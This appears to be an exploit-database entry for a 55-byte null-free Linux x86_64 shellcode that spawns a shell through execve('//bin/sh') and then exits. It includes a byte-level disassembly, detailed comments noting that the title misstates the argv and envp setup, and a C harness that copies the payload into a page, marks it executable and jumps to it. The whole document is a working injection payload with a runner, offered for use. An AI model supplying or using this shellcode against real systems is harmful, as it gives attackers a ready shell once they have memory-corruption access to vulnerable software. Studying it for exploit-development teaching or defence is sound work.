Linux/x86_64 syscall(SYS_execve,"/bin/sh", ["/bin/sh", NULL], NULL) 55 bytes (note: as assembled, the path is "//bin/sh" and both argv and envp point at an empty NULL-terminated array rather than ["/bin/sh", NULL] and NULL — see the disassembly notes below)



EKU-ID: 5746 CVE: OSVDB-ID:
Author: tesla_ Published: 2016-07-28 Verified: Verified


#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
  
/*
 * 400078:      0f 31                   rdtsc
 *                                      (writes edx:eax; both are zeroed by the xors that follow, so this is a functional no-op here)
 * 40007a:      48 31 c0                xor    %rax,%rax
 * 40007d:      48 31 db                xor    %rbx,%rbx
 * 400080:      48 31 c9                xor    %rcx,%rcx
 * 400083:      48 31 d2                xor    %rdx,%rdx
 * 400086:      50                      push   %rax
 * 400087:      50                      push   %rax
 * 400088:      48 bb 2f 2f 62 69 6e    movabs $0x68732f6e69622f2f,%rbx
 * 40008f:      2f 73 68
 * 400092:      53                      push   %rbx
 * 400093:      48 8d 54 24 10          lea    0x10(%rsp),%rdx
 * 400098:      48 8d 74 24 08          lea    0x8(%rsp),%rsi
 * 40009d:      48 8d 3c 24             lea    (%rsp),%rdi
 * 4000a1:      b0 3b                   mov    $0x3b,%al
 * 4000a3:      0f 05                   syscall
 * 4000a5:      48 31 c0                xor    %rax,%rax
 * 4000a8:      48 31 ff                xor    %rdi,%rdi
 * 4000ab:      b0 3c                   mov    $0x3c,%al
 * 4000ad:      0f 05                   syscall
 */
  
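/*
 * Linux x86_64, 55 bytes: execve("//bin/sh", argv, envp) via syscall 59, then
 * exit(0) via syscall 60 if execve returns.
 *
 * What the bytes actually do (see the disassembly above):
 *   - two `push %rax` (rax == 0) followed by `push %rbx` leave the stack as
 *       [rsp+0]  "//bin/sh"  (8 bytes, no terminator of its own)
 *       [rsp+8]  0           (terminates the path AND is argv[0])
 *       [rsp+16] 0           (envp[0])
 *     then rdi = rsp, rsi = rsp+8, rdx = rsp+16.
 *     So argv is an EMPTY NULL-terminated array, not ["/bin/sh", NULL], and
 *     envp is an empty array rather than NULL.  A shell still starts, but
 *     anything that keys on argv[0] does not see "/bin/sh".
 *     NOTE(review): recent kernels (5.18+, as I recall) substitute an empty
 *     argv[0] string when argc == 0 -- confirm on the target kernel.
 *   - the leading `rdtsc` is immediately overwritten by the xors: a no-op.
 *   - `mov $0x3b,%al` and `mov $0x3c,%al` rely on rax having just been zeroed.
 *   - the payload contains no 0x00 byte, so it survives NUL-terminated copies
 *     and strlen() on it yields the full 55 bytes.
 *
 * Stored as a const array (not a pointer to a string literal) so the length
 * is available as `sizeof shellcode - 1` and the bytes are not writable.
 *
 * tesla_ (gandung@ppp.cylab.cmu.edu)
 */
const unsigned char shellcode[] =
        "\x0f\x31\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2"
        "\x50\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48"
        "\x8d\x54\x24\x10\x48\x8d\x74\x24\x08\x48\x8d\x3c\x24\xb0"
        "\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05";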
  
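/*
 * Handle for the executable page the payload is copied into.  The payload is
 * entered with a plain indirect call and reads no arguments, so a
 * no-argument, no-result function pointer describes it accurately.
 * (regparm() is an i386-only calling-convention attribute; on x86-64 the
 * compiler ignores it, so the original three-argument signature bought nothing.)
 */
void (*q)(void);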
  
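/*
 * Copy the payload into a fresh page, make it executable, and jump to it.
 * Returns 1 (with a strerror() message on stderr) if any system call fails;
 * on success the payload's execve() replaces this process, so main() only
 * returns 0 if the payload comes back, which this one never does.
 */
int main(void) {
        long pagesz_l;
        size_t pagesz;
        size_t len;
        void *page;

        /* Payload length.  strlen() is correct only because the payload has
         * no NUL byte (every byte is listed in the table above); a payload
         * with an embedded 0x00 would be silently truncated here. */
        len = strlen((const char *)shellcode);

        pagesz_l = sysconf(_SC_PAGESIZE);
        if (pagesz_l <= 0) {
                fprintf(stderr, "sysconf(_SC_PAGESIZE) failed: %s\n", strerror(errno));
                return 1;
        }
        pagesz = (size_t)pagesz_l;
        if (len == 0 || len > pagesz) {
                fprintf(stderr, "payload length %zu does not fit one page (%zu)\n", len, pagesz);
                return 1;
        }

        /* Map the page writable but NOT executable, copy, then flip to RX so
         * the page is never writable and executable at the same time (W^X).
         * This is hygiene, not evasion: policies that forbid anonymous
         * executable memory altogether (SELinux execmem, PaX MPROTECT) will
         * still reject the mprotect() below, and that failure is reported.
         * The mapping is anonymous and private; MAP_SHARED bought nothing. */
        page = mmap(NULL, pagesz, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED) {
                /* A NULL hint lets the kernel choose any address; a failure
                 * here has nothing to do with the zero page or
                 * vm.mmap_min_addr -- report the real errno instead. */
                fprintf(stderr, "mmap(%zu bytes, RW) failed: %s\n", pagesz, strerror(errno));
                return 1;
        }

        memcpy(page, shellcode, len);

        if (mprotect(page, pagesz, PROT_READ | PROT_EXEC) != 0) {
                fprintf(stderr, "mprotect(RX) failed: %s\n", strerror(errno));
                munmap(page, pagesz);
                return 1;
        }

        /* Publish the handle in the file-scope variable, then enter the page
         * with an ordinary indirect call so the compiler chooses and saves
         * registers itself.  The inline `call *%rax` this replaces hard-coded
         * %rax in the template while its "r" constraint let the compiler put
         * the operand in any register, so the target was not guaranteed to be
         * in %rax.  The payload ends in execve()/exit(): control does not
         * come back on either path. */
        q = page;
        ((void (*)(void))page)();

        /* Not reached with this payload; kept so a returning payload is tidy. */
        munmap(page, pagesz);
        return 0;
}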